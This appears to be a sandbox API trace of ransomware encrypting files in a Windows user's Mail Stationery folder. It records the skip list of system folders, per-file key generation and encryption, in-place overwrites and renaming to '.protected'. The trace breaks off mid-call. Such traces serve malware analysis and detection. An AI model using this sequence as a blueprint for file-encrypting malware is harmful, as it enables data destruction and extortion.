[0085.546] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.protected") returned 108 [0085.546] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg.protected")) returned 1 [0085.547] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.547] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="Windows") returned -1 [0085.547] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="Program Files") returned -1 [0085.547] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="Program Files (x86)") returned -1 [0085.547] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="$Recycle.bin") returned 1 [0085.547] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="System Volume Information") returned -1 [0085.547] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 97 [0085.547] StrStrIW (lpFirst="Hand Prints.htm", lpSrch=".protected") returned 0x0 [0085.547] lstrcmpW (lpString1="Hand Prints.htm", lpString2="RESTORE_FILES.txt") returned -1 [0085.547] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.547] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.548] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 97 [0085.548] StrStrW (lpFirst="Hand Prints.htm", lpSrch=".txt") returned 0x0 [0085.548] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 97 [0085.548] StrStrW (lpFirst="Hand Prints.htm", lpSrch=".rar") returned 0x0 [0085.548] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 97 [0085.548] StrStrW (lpFirst="Hand Prints.htm", lpSrch=".zip") returned 0x0 [0085.548] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xeb, lpOverlapped=0x0) returned 1 [0085.549] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff15, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.549] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xeb, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xeb, lpOverlapped=0x0) returned 1 [0085.550] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.550] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.550] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.550] CloseHandle (hObject=0x150) returned 1 [0085.560] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.protected") returned 107 [0085.560] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm.protected")) returned 1 [0085.571] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.571] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="Windows") returned -1 [0085.571] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="Program Files") returned -1 [0085.571] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="Program Files (x86)") returned -1 [0085.571] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="$Recycle.bin") returned 1 [0085.571] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="System Volume Information") returned -1 [0085.572] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 96 [0085.572] StrStrIW (lpFirst="HandPrints.jpg", lpSrch=".protected") returned 0x0 [0085.572] lstrcmpW (lpString1="HandPrints.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0085.572] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.572] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.572] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 96 [0085.572] StrStrW (lpFirst="HandPrints.jpg", lpSrch=".txt") returned 0x0 [0085.572] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 96 [0085.572] StrStrW (lpFirst="HandPrints.jpg", lpSrch=".rar") returned 0x0 [0085.572] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 96 [0085.572] StrStrW (lpFirst="HandPrints.jpg", lpSrch=".zip") returned 0x0 [0085.574] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x107e, lpOverlapped=0x0) returned 1 [0085.592] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffef82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.592] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x107e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x107e, lpOverlapped=0x0) returned 1 [0085.593] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.593] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.593] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.594] CloseHandle (hObject=0x150) returned 1 [0085.594] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.protected") returned 106 [0085.594] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg.protected")) returned 1 [0085.595] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.595] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="Windows") returned -1 [0085.595] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="Program Files") returned -1 [0085.595] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="Program Files (x86)") returned -1 [0085.595] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="$Recycle.bin") returned 1 [0085.595] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="System Volume Information") returned -1 [0085.595] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 100 [0085.595] StrStrIW (lpFirst="Orange Circles.htm", lpSrch=".protected") returned 0x0 [0085.595] lstrcmpW (lpString1="Orange Circles.htm", lpString2="RESTORE_FILES.txt") returned -1 [0085.595] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.596] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 100 [0085.597] StrStrW (lpFirst="Orange Circles.htm", lpSrch=".txt") returned 0x0 [0085.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 100 [0085.597] StrStrW (lpFirst="Orange Circles.htm", lpSrch=".rar") returned 0x0 [0085.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 100 [0085.597] StrStrW (lpFirst="Orange Circles.htm", lpSrch=".zip") returned 0x0 [0085.597] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0085.598] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.598] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0085.599] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.599] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.599] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.599] CloseHandle (hObject=0x150) returned 1 [0085.600] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.protected") returned 110 [0085.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm.protected")) returned 1 [0085.601] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.601] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="Windows") returned -1 [0085.601] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="Program Files") returned -1 [0085.601] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="Program Files (x86)") returned -1 [0085.601] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="$Recycle.bin") returned 1 [0085.601] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="System Volume Information") returned -1 [0085.601] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 99 [0085.601] StrStrIW (lpFirst="OrangeCircles.jpg", lpSrch=".protected") returned 0x0 [0085.601] lstrcmpW (lpString1="OrangeCircles.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0085.601] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.601] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.606] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 99 [0085.606] StrStrW (lpFirst="OrangeCircles.jpg", lpSrch=".txt") returned 0x0 [0085.606] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 99 [0085.606] StrStrW (lpFirst="OrangeCircles.jpg", lpSrch=".rar") returned 0x0 [0085.606] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 99 [0085.606] StrStrW (lpFirst="OrangeCircles.jpg", lpSrch=".zip") returned 0x0 [0085.606] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x18ed, lpOverlapped=0x0) returned 1 [0085.624] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe713, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.624] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x18ed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x18ed, lpOverlapped=0x0) returned 1 [0085.625] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.625] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.625] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.625] CloseHandle (hObject=0x150) returned 1 [0085.626] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.protected") returned 109 [0085.626] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg.protected")) returned 1 [0085.627] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.627] lstrcmpiW (lpString1="Peacock.htm", lpString2="Windows") returned -1 [0085.627] lstrcmpiW (lpString1="Peacock.htm", lpString2="Program Files") returned -1 [0085.627] lstrcmpiW (lpString1="Peacock.htm", lpString2="Program Files (x86)") returned -1 [0085.627] lstrcmpiW (lpString1="Peacock.htm", lpString2="$Recycle.bin") returned 1 [0085.627] lstrcmpiW (lpString1="Peacock.htm", lpString2="System Volume Information") returned -1 [0085.627] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 93 [0085.627] StrStrIW (lpFirst="Peacock.htm", lpSrch=".protected") returned 0x0 [0085.627] lstrcmpW (lpString1="Peacock.htm", lpString2="RESTORE_FILES.txt") returned -1 [0085.627] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.627] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 93 [0085.628] StrStrW (lpFirst="Peacock.htm", lpSrch=".txt") returned 0x0 [0085.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 93 [0085.628] StrStrW (lpFirst="Peacock.htm", lpSrch=".rar") returned 0x0 [0085.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 93 [0085.628] StrStrW (lpFirst="Peacock.htm", lpSrch=".zip") returned 0x0 [0085.628] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xe8, lpOverlapped=0x0) returned 1 [0085.629] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.629] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xe8, lpOverlapped=0x0) returned 1 [0085.654] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.654] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.654] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.654] CloseHandle (hObject=0x150) returned 1 [0085.658] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.protected") returned 103 [0085.658] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm.protected")) returned 1 [0085.664] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.664] lstrcmpiW (lpString1="Peacock.jpg", lpString2="Windows") returned -1 [0085.664] lstrcmpiW (lpString1="Peacock.jpg", lpString2="Program Files") returned -1 [0085.664] lstrcmpiW (lpString1="Peacock.jpg", lpString2="Program Files (x86)") returned -1 [0085.664] lstrcmpiW (lpString1="Peacock.jpg", lpString2="$Recycle.bin") returned 1 [0085.664] lstrcmpiW (lpString1="Peacock.jpg", lpString2="System Volume Information") returned -1 [0085.664] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 93 [0085.664] StrStrIW (lpFirst="Peacock.jpg", lpSrch=".protected") returned 0x0 [0085.664] lstrcmpW (lpString1="Peacock.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0085.664] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.664] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.665] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows 